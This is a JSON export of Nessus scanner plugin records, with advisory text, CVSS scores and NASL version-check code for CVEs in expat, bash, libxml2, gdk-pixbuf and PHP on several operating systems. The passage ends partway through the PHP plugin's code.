{"nessus": [{"lastseen": "2019-11-01T02:06:28", "bulletinFamily": "scanner", "description": "According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1446.NASL", "href": "https://www.tenable.com/plugins/nessus/124949", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124949);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2016-0718\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c2493683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"expat-2.1.0-10.h1\",\n \"expat-devel-2.1.0-10.h1\",\n \"expat-static-2.1.0-10.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:09:01", "bulletinFamily": "scanner", "description": "An update of the bash package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2017-0040_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/121741", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Bash PHSA-2017-0040", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0040. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121741);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2016-0634\");\n\n script_name(english:\"Photon OS 1.0: Bash PHSA-2017-0040\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the bash package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-80.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10309\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-4.3.48-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-debuginfo-4.3.48-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-lang-4.3.48-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:08:58", "bulletinFamily": "scanner", "description": "An update of the libxml2 package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2017-0001_LIBXML2.NASL", "href": "https://www.tenable.com/plugins/nessus/121663", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Libxml2 PHSA-2017-0001", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0001. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121663);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/03/28 10:07:15\");\n\n script_cve_id(\"CVE-2016-9318\");\n\n script_name(english:\"Photon OS 1.0: Libxml2 PHSA-2017-0001\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the libxml2 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-16.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-2.9.4-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-debuginfo-2.9.4-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-devel-2.9.4-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-python-2.9.4-3.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:18:32", "bulletinFamily": "scanner", "description": "The patch introduced in DLA-1234-1 had a problem that caused\ngdk-pixbuf", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-1234.NASL", "href": "https://www.tenable.com/plugins/nessus/105661", "published": "2018-01-09T00:00:00", "title": "Debian DLA-1234-2 : gdk-pixbuf regression update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1234-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105661);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/01/10 15:14:44 $\");\n\n script_name(english:\"Debian DLA-1234-2 : gdk-pixbuf regression update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The patch introduced in DLA-1234-1 had a problem that caused\ngdk-pixbuf's gif module to fail to load.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.26.1-1+deb7u8.\n\nWe recommend that you upgrade your gdk-pixbuf packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/gdk-pixbuf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gir1.2-gdkpixbuf-2.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"gir1.2-gdkpixbuf-2.0\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-0\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-common\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-dev\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-doc\", reference:\"2.26.1-1+deb7u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-01T02:38:42", "bulletinFamily": "scanner", "description": "libxml2 developers report :\n\nThe htmlParseTryOrFinish function in HTMLparser.c in libxml2 2.9.4\nallows attackers to cause a denial of service (buffer over-read) or\ninformation disclosure.\n\nA buffer overflow was discovered in libxml2\n20904-GITv2.9.4-16-g0741801. The function xmlSnprintfElementContent in\nvalid.c is supposed to recursively dump the element content definition\ninto a char buffer ", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_76E59F554F7A4887BCB011604004163A.NASL", "href": "https://www.tenable.com/plugins/nessus/105216", "published": "2017-12-14T00:00:00", "title": "FreeBSD : libxml2 -- Multiple Issues (76e59f55-4f7a-4887-bcb0-11604004163a)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105216);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/21 10:46:31\");\n\n script_cve_id(\"CVE-2017-8872\", \"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\");\n\n script_name(english:\"FreeBSD : libxml2 -- Multiple Issues (76e59f55-4f7a-4887-bcb0-11604004163a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libxml2 developers report :\n\nThe htmlParseTryOrFinish function in HTMLparser.c in libxml2 2.9.4\nallows attackers to cause a denial of service (buffer over-read) or\ninformation disclosure.\n\nA buffer overflow was discovered in libxml2\n20904-GITv2.9.4-16-g0741801. The function xmlSnprintfElementContent in\nvalid.c is supposed to recursively dump the element content definition\ninto a char buffer 'buf' of size 'size'. The variable len is assigned\nstrlen(buf). If the content->type is XML_ELEMENT_CONTENT_ELEMENT, then\n(i) the content->prefix is appended to buf (if it actually fits)\nwhereupon (ii) content->name is written to the buffer. However, the\ncheck for whether the content->name actually fits also uses 'len'\nrather than the updated buffer length strlen(buf). This allows us to\nwrite about 'size' many bytes beyond the allocated memory. This\nvulnerability causes programs that use libxml2, such as PHP, to crash.\n\nlibxml2 20904-GITv2.9.4-16-g0741801 is vulnerable to a stack-based\nbuffer overflow. The function xmlSnprintfElementContent in valid.c is\nsupposed to recursively dump the element content definition into a\nchar buffer 'buf' of size 'size'. At the end of the routine, the\nfunction may strcat two more characters without checking whether the\ncurrent strlen(buf) + 2 < size. This vulnerability causes programs\nthat use libxml2, such as PHP, to crash.\n\nlibxml2 20904-GITv2.9.4-16-g0741801 is vulnerable to a heap-based\nbuffer over-read in the xmlDictComputeFastKey function in dict.c. This\nvulnerability causes programs that use libxml2, such as PHP, to crash.\nThis vulnerability exists because of an incomplete fix for libxml2 Bug\n759398.\n\nlibxml2 20904-GITv2.9.4-16-g0741801 is vulnerable to a heap-based\nbuffer over-read in the xmlDictAddString function in dict.c. This\nvulnerability causes programs that use libxml2, such as PHP, to crash.\nThis vulnerability exists because of an incomplete fix for\nCVE-2016-1839.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.gnome.org/show_bug.cgi?id=775200\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98599\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98599\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98556\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98556\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98601\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98601\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98568\"\n );\n # https://vuxml.freebsd.org/freebsd/76e59f55-4f7a-4887-bcb0-11604004163a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fff120c8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libxml2<=2.9.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2019-11-17T19:18:50", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote \nweb server is 7.1.x prior to 7.1.11. It is, therefore, affected by \nmultiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "PHP_7_1_11.NASL", "href": "https://www.tenable.com/plugins/nessus/104633", "published": "2017-11-16T00:00:00", "title": "PHP 7.1.x < 7.1.11 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104633);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 7.1.x < 7.1.11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 7.1.x prior to 7.1.11. It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.1.11\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.1.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1283\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = 